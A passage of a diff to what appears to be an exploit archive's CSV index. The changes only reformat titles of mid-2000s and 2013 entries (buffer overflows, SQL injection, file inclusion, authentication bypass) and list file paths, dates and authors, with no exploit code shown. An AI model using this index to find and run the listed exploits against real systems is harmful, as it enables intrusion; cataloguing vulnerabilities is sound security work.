Wang",windows,remote,0 25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",linux,remote,0 -25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 -25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 ActiveX Control File Enumeration Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 +25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 +25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 - ActiveX Control File Enumeration Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 25033,platforms/windows/remote/25033.txt,"GREED 0.81 GRX File List Buffer Overflow Vulnerability",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25034,platforms/windows/remote/25034.txt,"GREED 0.81 GRX File List Command Execution Vulnerability",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25035,platforms/linux/remote/25035.txt,"PCAL 4.x Calendar File getline Buffer Overflow Vulnerability",2004-12-15,"Danny Lungstrom",linux,remote,0 @@ -22191,9 +22191,9 @@ id,file,description,date,author,platform,type,port 25087,platforms/php/webapps/25087.txt,"Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 -25090,platforms/php/webapps/25090.txt,"XGB 2.0 Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 +25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 -25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 +25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.PHP SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 Mouse Event URI Status Bar Obfuscation Weakness",2005-02-14,Paul,windows,remote,0 @@ -22205,7 +22205,7 @@ id,file,description,date,author,platform,type,port 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass Vulnerability",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 -25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 Arbitrary Local PHP File Include Vulnerability",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Include Vulnerability",2005-02-15,"RedTeam Pentesting",php,webapps,0 25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 Contact_us.PHP Cross-Site Scripting Vulnerability",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String Vulnerability",2005-02-16,"Ulf Harnhammar",linux,local,0 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient Malformed IP Address Local Memory Access Vulnerability",2005-02-16,"Wang Ning",hardware,dos,0 @@ -22269,9 +22269,9 @@ id,file,description,date,author,platform,type,port 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow Vulnerability",2005-02-26,Expanders,multiple,dos,0 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (1)",2004-12-26,"Miguel Tarasc",windows,remote,0 25167,platforms/windows/remote/25167.c,"Working Resources BadBlue 2.55 MFCISAPICommand Remote Buffer Overflow Vulnerability (2)",2005-02-27,class101,windows,remote,0 -25168,platforms/php/webapps/25168.c,"PHPBB 2.0.x Authentication Bypass Vulnerability (1)",2005-02-28,Paisterist,php,webapps,0 -25169,platforms/php/webapps/25169.pl,"PHPBB 2.0.x Authentication Bypass Vulnerability (2)",2005-02-28,phuket,php,webapps,0 -25170,platforms/php/webapps/25170.cpp,"PHPBB 2.0.x Authentication Bypass Vulnerability (3)",2005-02-28,overdose,php,webapps,0 +25168,platforms/php/webapps/25168.c,"PHPBB 2.0.x - Authentication Bypass Vulnerability (1)",2005-02-28,Paisterist,php,webapps,0 +25169,platforms/php/webapps/25169.pl,"PHPBB 2.0.x - Authentication Bypass Vulnerability (2)",2005-02-28,phuket,php,webapps,0 +25170,platforms/php/webapps/25170.cpp,"PHPBB 2.0.x - Authentication Bypass Vulnerability (3)",2005-02-28,overdose,php,webapps,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service Vulnerabilities",2005-02-28,"Luigi Auriemma",multiple,dos,0 25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x CATID Parameter Remote SQL Injection Vulnerability",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x SHOW Parameter Remote SQL Injection Vulnerability",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 @@ -22281,7 +22281,7 @@ id,file,description,date,author,platform,type,port 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 X-Forwarded-For Script Injection Vulnerability",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x DelPM.PHP Arbitrary Personal Message Deletion Vulnerability",2005-03-01,Raven,php,webapps,0 -25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 Auth.PHP Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 +25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.PHP Remote File Include Vulnerability",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote PNG Image File Parsing Buffer Overflow Vulnerability",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 @@ -22290,7 +22290,7 @@ id,file,description,date,author,platform,type,port 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x, Firefox 1.0, Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 -25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 +25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Arbitrary Remote PHP File Include Vulnerability",2005-03-04,"Filip Groszynski",php,webapps,0 25190,platforms/multiple/remote/25190.txt,"ca3de Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow Vulnerability",2005-03-07,"Luigi Auriemma",multiple,remote,0 25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Include Vulnerability",2005-03-05,mozako,php,webapps,0 @@ -22462,7 +22462,7 @@ id,file,description,date,author,platform,type,port 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local Arbitrary File Overwrite Vulnerability",2005-04-07,anonymous,irix,local,0 25363,platforms/windows/dos/25363.py,"Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH",2013-05-11,ariarat,windows,dos,0 25364,platforms/windows/dos/25364.txt,"AN HTTPD CMDIS.DLL Remote Buffer Overflow Vulnerability",2005-04-08,"Tan Chew Keong",windows,dos,0 -25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 Arbitrary Log Content Injection Vulnerability",2005-04-08,"Tan Chew Keong",windows,remote,0 +25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection Vulnerability",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 Module Parameter Remote Cross-Site Scripting Vulnerability",2005-04-08,Dcrab,php,webapps,0 25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 SID Parameter Remote SQL Injection Vulnerability",2005-04-08,Dcrab,php,webapps,0 @@ -22612,7 +22612,7 @@ id,file,description,date,author,platform,type,port 25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 Access.ASP Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 Error.ASP Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 Login.ASP Redirect Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 -25517,platforms/linux/remote/25517.rb,"Mutiny 5 Arbitrary File Upload",2013-05-17,metasploit,linux,remote,0 +25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,metasploit,linux,remote,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 25519,platforms/php/webapps/25519.txt,"ZPanel templateparser.class.php - Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 Login.ASP Message Argument Cross-Site Scripting Vulnerability",2005-04-23,Dcrab,asp,webapps,0 @@ -22689,7 +22689,7 @@ id,file,description,date,author,platform,type,port 25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x User.CGI Cross-Site Scripting Vulnerability",2005-05-04,"Nathan House",cgi,webapps,0 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 Defer.ASP SQL Injection Vulnerability",2005-05-04,Zinho,asp,webapps,0 25596,platforms/asp/webapps/25596.txt,"ASP Inline Corporate Calendar 3.6.3 Details.ASP SQL Injection Vulnerability",2005-05-04,Zinho,asp,webapps,0 -25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 ActiveX Control SRC Information Disclosure Vulnerability",2005-05-04,"Robert Fly",windows,remote,0 +25597,platforms/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure Vulnerability",2005-05-04,"Robert Fly",windows,remote,0 25598,platforms/osx/remote/25598.txt,"Apple Mac OS X 10.x BlueTooth Directory Traversal Vulnerability",2005-05-04,"Kevin Finisterre",osx,remote,0 25599,platforms/php/webapps/25599.txt,"interspire articlelive 2005 - Multiple Vulnerabilities",2005-05-04,Dcrab,php,webapps,0 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal Vulnerability",2005-05-04,"Donato Ferrante",windows,remote,0 @@ -22718,7 +22718,7 @@ id,file,description,date,author,platform,type,port 25624,platforms/unix/remote/25624.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)",2005-05-06,"Luca Ercoli",unix,remote,0 25625,platforms/unix/remote/25625.c,"Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)",2005-05-11,K-sPecial,unix,remote,0 25626,platforms/osx/remote/25626.c,"4D WebStar 5.3/5.4 Tomcat Plugin Remote Buffer Overflow Vulnerability",2005-05-06,"Braden Thomas",osx,remote,0 -25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 Arbitrary File Upload Vulnerability",2005-05-06,tjomi4,php,remote,0 +25627,platforms/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload Vulnerability",2005-05-06,tjomi4,php,remote,0 25628,platforms/jsp/webapps/25628.txt,"PHPBB 2.0.x URL Tag BBCode.PHP Vulnerability",2005-05-09,Papados,jsp,webapps,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 FTP Commands Remote Buffer Overflow Vulnerability",2008-05-08,Samsta,windows,dos,0 25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 Index.PHP Entry Parameter SQL Injection Vulnerability",2005-05-09,"Spy Hat",php,webapps,0 @@ -22777,7 +22777,7 @@ id,file,description,date,author,platform,type,port 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass Vulnerability",2005-05-19,"Francesco Orro",hardware,remote,0 25685,platforms/jsp/webapps/25685.txt,"Sun JavaMail 1.3 API MimeMessage Infromation Disclosure Vulnerability",2005-05-19,"Ricky Latt",jsp,webapps,0 -25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 Arbitrary File Include Vulnerability",2005-05-19,"Ingvar Gilbert",php,webapps,0 +25686,platforms/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Include Vulnerability",2005-05-19,"Ingvar Gilbert",php,webapps,0 25687,platforms/freebsd/remote/25687.c,"Picasm 1.10/1.12 Error Generation Remote Buffer Overflow Vulnerability",2005-05-20,"Shaun Colley",freebsd,remote,0 25688,platforms/linux/local/25688.txt,"Gedit 2.x Filename Format String Vulnerability",2005-05-30,jsk:exworm,linux,local,0 25689,platforms/php/webapps/25689.txt,"EJ3 TOPo 2.2 - Multiple Index.PHP Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,php,webapps,0 @@ -22875,7 +22875,7 @@ id,file,description,date,author,platform,type,port 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0 -25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0 +25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0 25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0 @@ -23032,7 +23032,7 @@ id,file,description,date,author,platform,type,port 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,multiple,remote,0 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 -25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0 +25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 @@ -23061,7 +23061,7 @@ id,file,description,date,author,platform,type,port 25973,platforms/php/webapps/25973.txt,"RuubikCMS 1.1.1 (tinybrowser.php, folder param) - Path Traversal Vulnerability",2013-06-05,expl0i13r,php,webapps,0 25974,platforms/osx/dos/25974.txt,"Mac OS X Server DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,metasploit,linux,remote,5555 -25976,platforms/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 +25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,metasploit,windows,remote,0 @@ -23087,7 +23087,7 @@ id,file,description,date,author,platform,type,port 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free",2013-06-07,"Scott Bell",windows,remote,0 26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess HTML Injection Vulnerability",2005-07-15,"Francisco Amato",java,webapps,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x XML File Disclosure Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 -26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x Arbitrary File Disclosure Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 +26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26005,platforms/windows/dos/26005.pl,"Alt-N MDaemon 8.0 IMAP Server CREATE Remote Buffer Overflow Vulnerability",2005-07-19,kcope,windows,dos,0 26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x Unauthorized Report Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -23098,7 +23098,7 @@ id,file,description,date,author,platform,type,port 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 10g/ 6i/9i/4.5.10/5.0/6.0.8 Services Unauthorized Form Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 Processform.PHP3 Name Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 Processform.PHP3 Failed Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 -26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x Auth.PHP SQL Injection Vulnerability",2005-07-20,GHC,php,webapps,0 +26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - Auth.PHP SQL Injection Vulnerability",2005-07-20,GHC,php,webapps,0 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 @@ -23193,7 +23193,7 @@ id,file,description,date,author,platform,type,port 26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 DeleteThread.PHP Cross-Site Scripting Vulnerability",2005-08-08,rgod,php,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 CSS Template Unauthorized Access Vulnerability",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 login.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 -26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 +26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - Search.PHP Cross-Site Scripting Vulnerability",2005-08-08,almaster,php,webapps,0 26116,platforms/php/webapps/26116.txt,"Chipmunk CMS 1.3 Fontcolor Cross-Site Scripting Vulnerability",2005-08-08,rgod,php,webapps,0 @@ -23298,14 +23298,14 @@ id,file,description,date,author,platform,type,port 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 USR Parameter Cross-Site Scripting Vulnerability",2005-08-31,rgod,php,webapps,0 26216,platforms/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow Vulnerability",2005-08-31,ViPeR,windows,dos,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 -26218,platforms/linux/local/26218.txt,"Frox 0.7.18 Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 +26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 Description Field HTML Injection Vulnerability",2005-09-06,retrogod@aliceposta.it,php,webapps,0 -26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 Arbitrary Remote File Upload Vulnerability",2005-09-06,rgod,php,webapps,0 +26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary Remote File Upload Vulnerability",2005-09-06,rgod,php,webapps,0 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 Forumdisplay.PHP Cross-Site Scripting Vulnerability",2005-09-06,Dominic.Parikh,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injection Vulnerabilities",2005-09-06,stranger-killer,php,webapps,0 @@ -23331,7 +23331,7 @@ id,file,description,date,author,platform,type,port 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 S.PL Remote Directory Traversal Vulnerability",2005-09-13,h4cky0u,php,webapps,0 -26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 +26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload Vulnerability",2005-09-13,rgod,php,webapps,0 26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 Merchant.MVC Cross-Site Scripting Vulnerability",2005-09-14,admin@hyperconx.com,cgi,webapps,0 @@ -23365,7 +23365,7 @@ id,file,description,date,author,platform,type,port 26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 Session ID Authentication Bypass Vulnerability",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 -26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox Arbitrary Command Execution Vulnerability",2005-09-20,"eter Zelezny",linux,remote,0 +26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution Vulnerability",2005-09-20,"eter Zelezny",linux,remote,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 Perldiver.CGI Cross-Site Scripting Vulnerability",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 AddItem.ASP SQL Injection Vulnerability",2005-08-21,SmOk3,asp,webapps,0 @@ -23383,7 +23383,7 @@ id,file,description,date,author,platform,type,port 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 index.php Multiple Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 cart.php redir Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin Add.PHP Cross-Site Scripting Vulnerability",2005-09-29,anonymous,php,webapps,0 -26306,platforms/windows/remote/26306.txt,"NateOn Messenger 3.0 Arbitrary File Download And Buffer Overflow Vulnerabilities",2005-09-29,saintlinu,windows,remote,0 +26306,platforms/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download And Buffer Overflow Vulnerabilities",2005-09-29,saintlinu,windows,remote,0 26307,platforms/php/webapps/26307.txt,"lucidCMS 2.0 Login SQL Injection 